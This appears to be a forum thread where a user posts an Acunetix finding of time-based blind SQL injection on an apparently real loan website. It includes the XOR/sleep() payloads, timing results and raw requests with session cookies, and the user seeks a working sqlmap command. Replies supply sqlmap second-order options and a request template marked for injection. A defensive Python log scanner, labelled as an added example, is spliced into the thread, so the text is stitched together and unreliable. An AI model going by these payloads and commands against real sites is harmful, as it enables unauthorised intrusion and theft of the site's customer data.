
Acunetix SQL, looking for help

datelover (HDD-drive, User; registered 21.06.2022; messages: 22; reactions: 5)
When I was testing a website today, I found this SQL injection, which is the first time I have encountered one like it.
I have used many sqlmap commands, but all failed. Can anyone help me and write down the exact sqlmap command? It would be much appreciated; maybe I can pay some thanks.


URL:https://www.example.com/
Parameter:/<s>/[*]/

Path Fragment input /<s>/[*]/ was set to 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

Tests performed:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.664
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.199
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.187
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.194
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.216
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.189
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.198

Original value: s_ship


GET /shangjia/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=93f3Orvwzva9kfBjADF8HWOeEJQS0KvZi63LBYT9ACPFgPZ%2BuZshn%2FVAXPY5og; Secure; qpZg_566b_authNum=7002gUiwmqexj84NPKU0758LSS4qvkS2Xj4DFsKWMyEGitvTGT5GNarlEWeoO1LWG3F6qj8V; qpZg_566b_authCode=335aHQcn9ifoQITXOWV1rAgIjiKTE2NkoWFPM8TiKVo%2FIQ; qpZg_566b_choosePC=e4beFciqxYVSssW7%2BPE%2B2rJcHu%2FDvQaHExw5zged0X8O5atarDQvWg; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C22%7C%E9%87%8D%E5%BA%86%7Chttp%3A%2F%2Fcq.edai.com%7Ccq; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=9f79asEMr8yfGa4AhZnJkas%2BjiIdrrpXJ45rUY3bcxey3MINZQP8yywKu3kVVkBmOCSMfaEsEcv23PmFTgkYjfbN2CKk7JqecJkdOQtgouB40lOOaatVCHdI4csRd2HNiaxeRRRqqfXLfbXC65QSxRuYV0Wb9FsBQFdsDg7gUYJd0a6dFGNkOOwXCNJSlWVFUYNbBoAvACJgXFQ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive
The second injection point is this.


URL:https://www.example.com/
Parameter:/<s>/[*].html

Path Fragment input /<s>/[*].html was set to 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

Tests performed:
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.213
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z => 15.319
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.207
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.315
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.188
0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.219
0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.194

Original value: guwen


GET /shangjia/0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=dee5mneZRSZWsWk81WZrkOQMQOBgXXXYcB%2FKi%2Bs%2F%2F9BTK8A3SkQtXwUOot%2Fexg; Secure; qpZg_566b_authNum=41f5Ai35OjHQ44HimyVcYtNPbZOBtb%2Bfo7q5%2FGtbN3KTa6w9iQ7%2BEqD8lr4oTJFW%2FXwWaK6X; qpZg_566b_authCode=b57cyOXDMYR0CHHmKEUnkspeQQcQzFzjC2IIWo9PXGnr0A; qpZg_566b_choosePC=a8241mNILiCaVs0nUjpRm4TJjlSdOGipdtZz05fksA8dkAJwlAXw; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C1%7C%E5%8C%97%E4%BA%AC%7Chttp%3A%2F%2Fbj.edai.com%7Cbj; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=c520EQYQA5wjiwfJ82zoT7xbz77D8haTTFDHK%2BxOR4IcdvCbdU629NKWNCVwLGX5gBdtpu7zn03Tl9SYD82QH9mA6h2inTjh48KEdfBxiNUBcfv3aIyaztUj7JLpOLgteV8glOfmvEW%2FZBAcZw%2FFCRu1b2oaEiR%2BmRxuAnmYibNGvWxZaE4lXBjEWmdOBk2p%2FGfR%2F9jbZbrgl73GMM8E3FNRDKz6t%2FkhvHcZ47PtfTz2%2F%2BK5IVtv6F9ADfPhxyKDz5uyx55VAN3Xp1jQ%2FKrWwneUlyDqrpfeHoUeW1HCEyeIJXRndA%2BBn%2BuqHC8o%2FfbxZ6UpSldvYPH%2FhQDru%2BoSxT2FLH%2FW1D6pZ9jnoA; qpZg_566b_city=a946pCKT%2BSd3ERz05e0DAJhQ1dSqmNbO9PsEW5kEng; Secure
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive
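From the defender's side, the Acunetix finding above boils down to an untrusted path fragment (the <s> segment that normally holds a slug such as s_ship or guwen) reaching a MySQL query, confirmed through the sleep(N) delay correlation listed under "Tests performed". The Python below is an added example and is not part of the original post, nor code from Acunetix or sqlmap: it scans constructed access-log lines for the time-based probe shape, reports the delay each probe would have caused (useful for matching against slow-request alerts), and shows the allow-list check for the fragment that rejects such input before it can reach a query. The log lines, IP addresses and the names scan_access_log, classify_request and is_valid_path_fragment are all assumptions made for the example.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample of a "combined" access log (assumption: not from the
# original post). Two lines mirror the path-fragment probe shape reported by
# the scanner, URL-encoded as a browser or scanner would actually send it;
# the other lines are benign traffic, including a query that contains the
# word "sleep" but no function call.
SAMPLE_LOG = r"""
203.0.113.10 - - [12/Feb/2023:10:14:01 +0000] "GET /shangjia/s_ship/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Feb/2023:10:14:07 +0000] "GET /shangjia/0%22XOR(if(now()=sysdate(),sleep(6),0))XOR%22Z/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Feb/2023:10:14:24 +0000] "GET /shangjia/0%22XOR(if(now()%3Dsysdate()%2Csleep(15)%2C0))XOR%22Z.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Feb/2023:10:15:02 +0000] "GET /shangjia/guwen.html HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Feb/2023:10:15:09 +0000] "GET /search?q=sleep%20apnea HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method,
# request target (path + query) and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of time-based blind probes. Each one requires the function-call
# syntax, so ordinary words such as "sleep" in a search query do not match.
TIME_BASED_PATTERNS = {
    "mysql-sleep": re.compile(r"\bsleep\s*\(", re.I),
    "mysql-benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "mysql-now-sysdate": re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I),
    "postgres-pg_sleep": re.compile(r"\bpg_sleep\s*\(", re.I),
    "mssql-waitfor": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "xor-wrapper": re.compile(r"\bxor\s*\(", re.I),
}
# The XOR wrapper alone is weak evidence; only these decide "suspicious".
STRONG_INDICATORS = {
    "mysql-sleep", "mysql-benchmark", "mysql-now-sysdate",
    "postgres-pg_sleep", "mssql-waitfor",
}
SLEEP_ARG_RE = re.compile(r"\b(?:sleep|pg_sleep)\s*\(\s*(\d+)", re.I)


def normalize(target: str) -> str:
    """URL-decode repeatedly (handles double encoding) and lower-case."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.lower()


def classify_request(target: str) -> dict:
    """Return the indicators found in one request target and the delay a
    sleep(N)-style payload would produce if the injection were live."""
    decoded = normalize(target)
    hits = [name for name, rx in TIME_BASED_PATTERNS.items() if rx.search(decoded)]
    m = SLEEP_ARG_RE.search(decoded)
    return {
        "decoded": decoded,
        "indicators": hits,
        "expected_delay_s": int(m.group(1)) if m else None,
        "suspicious": any(h in STRONG_INDICATORS for h in hits),
    }


def scan_access_log(text: str) -> list:
    """Parse the log and return one finding per request carrying a probe."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse (truncated, other format)
        result = classify_request(m.group("target"))
        if result["suspicious"]:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": result["decoded"],
                "indicators": result["indicators"],
                "expected_delay_s": result["expected_delay_s"],
            })
    return findings


# Mitigation side: the <s> fragment is a slug, so validate it against an
# allow-list before it is ever used in a query (and bind it as a parameter).
SLUG_RE = re.compile(r"^[a-z0-9_-]{1,64}$")


def is_valid_path_fragment(value: str) -> bool:
    """True only for plain slugs such as 's_ship' or 'guwen'."""
    return bool(SLUG_RE.fullmatch(value))


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} delay~{f['expected_delay_s']}s "
              f"{f['indicators']} {f['path']}")
```

Running the block prints the two probe requests with the 6 s and 15 s delays they encode, which is the same correlation the scanner used to confirm the finding; the benign slug requests and the "sleep apnea" search are not reported. The allow-list check is the fix that matters: with it in front of the query (and the value bound as a parameter rather than concatenated), the XOR/sleep payload never becomes SQL.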

Second-order attack

Options: --second-url and --second-req
Second-order SQL injection attack is an attack where result(s) of an injected payload in one vulnerable page is shown (reflected) at the other (e.g. frame). Usually that's happening because of database storage of user provided input at the original vulnerable page.
You can manually tell sqlmap to test for this type of SQL injection by using option --second-order with the URL address or --second-req with request file for sending to the server where results are being shown.
The second injection point is this
Damn, or is it just that a second injection was found? ))))
Then
GET /shangjia/0*.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.example.com/
Cookie: PHPSESSID=e249776d8f8aba2ef24df4f32a7af88d; qpZg_566b_fromPC=4089tZcrxBdEyoA0Iqhf%2BEV0UoExwn7sTdYb8FrCORlqF9LojmUGN2Sd3%2BU; qpZg_566b_tailshenqingip=dee5mneZRSZWsWk81WZrkOQMQOBgXXXYcB%2FKi%2Bs%2F%2F9BTK8A3SkQtXwUOot%2Fexg; Secure; qpZg_566b_authNum=41f5Ai35OjHQ44HimyVcYtNPbZOBtb%2Bfo7q5%2FGtbN3KTa6w9iQ7%2BEqD8lr4oTJFW%2FXwWaK6X; qpZg_566b_authCode=b57cyOXDMYR0CHHmKEUnkspeQQcQzFzjC2IIWo9PXGnr0A; qpZg_566b_choosePC=a8241mNILiCaVs0nUjpRm4TJjlSdOGipdtZz05fksA8dkAJwlAXw; qpZg_566b_newsFromPC=8f87355RsIaDJOqgsY3z3B0QBII1C9i0oQy8xq11YAbiefEHfxoj%2FFYoT5V8VgfWgAk05N7CpaRcq2seIaSGN9xOzBnDJ2blgQfYZbkigbziGpK9oWhgy7VdKYRspaq7X4PfprjqcllhDYPYfgjlOt5QbPvrF%2FN6MPnZ9CYbrZJJVN76I8nX%2FeWKWbndSNXKQGOFrdn%2Bn2Gr%2BKsNN%2Bh%2BubSLtV%2F7Rv2cgGapxI5r3iFvQohWDvZulm81; predomain=cHJlfDI1Mnzlub%2Flt558aHR0cDovL2d6LmVkYWkuY29tL3xneg%3D%3D; changeCity=0; yipdomain=yip%7C1%7C%E5%8C%97%E4%BA%AC%7Chttp%3A%2F%2Fbj.edai.com%7Cbj; qpZg_566b_evaluate_salary=7905QEAzSvThTuCYb%2Bv8nvdP2vPJfW9OtlJKt1gD4g; qpZg_566b_daikuan=c520EQYQA5wjiwfJ82zoT7xbz77D8haTTFDHK%2BxOR4IcdvCbdU629NKWNCVwLGX5gBdtpu7zn03Tl9SYD82QH9mA6h2inTjh48KEdfBxiNUBcfv3aIyaztUj7JLpOLgteV8glOfmvEW%2FZBAcZw%2FFCRu1b2oaEiR%2BmRxuAnmYibNGvWxZaE4lXBjEWmdOBk2p%2FGfR%2F9jbZbrgl73GMM8E3FNRDKz6t%2FkhvHcZ47PtfTz2%2F%2BK5IVtv6F9ADfPhxyKDz5uyx55VAN3Xp1jQ%2FKrWwneUlyDqrpfeHoUeW1HCEyeIJXRndA%2BBn%2BuqHC8o%2FfbxZ6UpSldvYPH%2FhQDru%2BoSxT2FLH%2FW1D6pZ9jnoA; qpZg_566b_city=a946pCKT%2BSd3ERz05e0DAJhQ1dSqmNbO9PsEW5kEng; Secure
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: www.example.com
Connection: Keep-alive
It's all the same thing...

